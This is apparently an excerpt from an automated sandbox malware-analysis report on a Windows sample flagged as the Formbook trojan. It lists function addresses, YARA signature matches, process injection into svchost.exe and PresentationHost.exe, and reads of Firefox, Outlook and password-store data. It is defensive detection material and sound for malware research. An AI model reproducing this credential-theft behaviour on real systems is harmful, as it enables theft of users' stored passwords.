Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDA352 6_2_04FDA352
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F10CF2 6_2_04F10CF2
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC0CB5 6_2_04FC0CB5
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F20C00 6_2_04F20C00
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F1ADE0 6_2_04F1ADE0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F38DBF 6_2_04F38DBF
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FBCD1F 6_2_04FBCD1F
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F2AD00 6_2_04F2AD00
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDEEDB 6_2_04FDEEDB
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F32E90 6_2_04F32E90
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDCE93 6_2_04FDCE93
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F20E59 6_2_04F20E59
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDEE26 6_2_04FDEE26
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F12FC8 6_2_04F12FC8
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F9EFA0 6_2_04F9EFA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F94F40 6_2_04F94F40
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F40F30 6_2_04F40F30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC2F30 6_2_04FC2F30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F62F28 6_2_04F62F28
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F4E8F0 6_2_04F4E8F0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F068B8 6_2_04F068B8
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F22840 6_2_04F22840
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F2A840 6_2_04F2A840
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F229A0 6_2_04F229A0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FEA9A6 6_2_04FEA9A6
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F36962 6_2_04F36962
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F1EA80 6_2_04F1EA80
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD6BD7 6_2_04FD6BD7
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDAB40 6_2_04FDAB40
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F11460 6_2_04F11460
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDF43F 6_2_04FDF43F
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FE95C3 6_2_04FE95C3
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FBD5B0 6_2_04FBD5B0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD7571 6_2_04FD7571
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD16CC 6_2_04FD16CC
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F65630 6_2_04F65630
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDF7B0 6_2_04FDF7B0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD70E9 6_2_04FD70E9
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDF0E0 6_2_04FDF0E0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FCF0CC 6_2_04FCF0CC
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F270C0 6_2_04F270C0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F2B1B0 6_2_04F2B1B0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F0F172 6_2_04F0F172
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FEB16B 6_2_04FEB16B
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F5516C 6_2_04F5516C
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3D2F0 6_2_04F3D2F0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC12ED 6_2_04FC12ED
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3B2C0 6_2_04F3B2C0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F252A0 6_2_04F252A0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F6739A 6_2_04F6739A
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F0D34C 6_2_04F0D34C
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD132D 6_2_04FD132D
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDFCF2 6_2_04FDFCF2
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F99C32 6_2_04F99C32
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3FDC0 6_2_04F3FDC0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD7D73 6_2_04FD7D73
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD1D5A 6_2_04FD1D5A
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F23D40 6_2_04F23D40
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F29EB0 6_2_04F29EB0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04EE3FD5 6_2_04EE3FD5
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04EE3FD2 6_2_04EE3FD2
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDFFB1 6_2_04FDFFB1
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F21F92 6_2_04F21F92
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDFF09 6_2_04FDFF09
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F238E0 6_2_04F238E0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F8D800 6_2_04F8D800
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F29950 6_2_04F29950
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3B950 6_2_04F3B950
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FB5910 6_2_04FB5910
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FCDAC6 6_2_04FCDAC6
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F65AA0 6_2_04F65AA0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FBDAAC 6_2_04FBDAAC
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FC1AA3 6_2_04FC1AA3
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F93A6C 6_2_04F93A6C
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDFA49 6_2_04FDFA49
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FD7A46 6_2_04FD7A46
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F95BF0 6_2_04F95BF0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F5DBF9 6_2_04F5DBF9
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04F3FB80 6_2_04F3FB80
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04FDFB76 6_2_04FDFB76
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B11900 6_2_00B11900
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B2A280 6_2_00B2A280
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B0CB30 6_2_00B0CB30
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B0ADD0 6_2_00B0ADD0
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B0CD50 6_2_00B0CD50
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B13420 6_2_00B13420
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B1341B 6_2_00B1341B
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03287E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0322B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 032BF290 appears 103 times
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: String function: 00607F41 appears 35 times
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: String function: 00620D27 appears 70 times
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: String function: 00628B40 appears 42 times
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: String function: 04F67E54 appears 107 times
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: String function: 04F9F290 appears 103 times
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: String function: 04F0B970 appears 262 times
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: String function: 04F8EA12 appears 86 times
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: String function: 04F55130 appears 58 times
Source: nJ8mJTmMf0.exe, 00000000.00000003.1661289845.000000000400D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
Source: nJ8mJTmMf0.exe, 00000000.00000003.1661178255.0000000003E63000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs nJ8mJTmMf0.exe
Source: nJ8mJTmMf0.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/11
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066A2D5 GetLastError,FormatMessageW, 0_2_0066A2D5
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00658713 AdjustTokenPrivileges,CloseHandle, 0_2_00658713
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00658CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00658CC3
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0066B59E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0067F121
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066C602 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0066C602
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00604FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00604FE9
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe File created: C:\Users\user\AppData\Local\Temp\aut8BB6.tmp Jump to behavior
Source: nJ8mJTmMf0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: nJ8mJTmMf0.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\nJ8mJTmMf0.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
Source: C:\Windows\SysWOW64\PresentationHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe" Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: nJ8mJTmMf0.exe Static file information: File size 1234944 > 1048576
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: nJ8mJTmMf0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: PresentationHost.pdbGCTL source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationHost.pdb source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
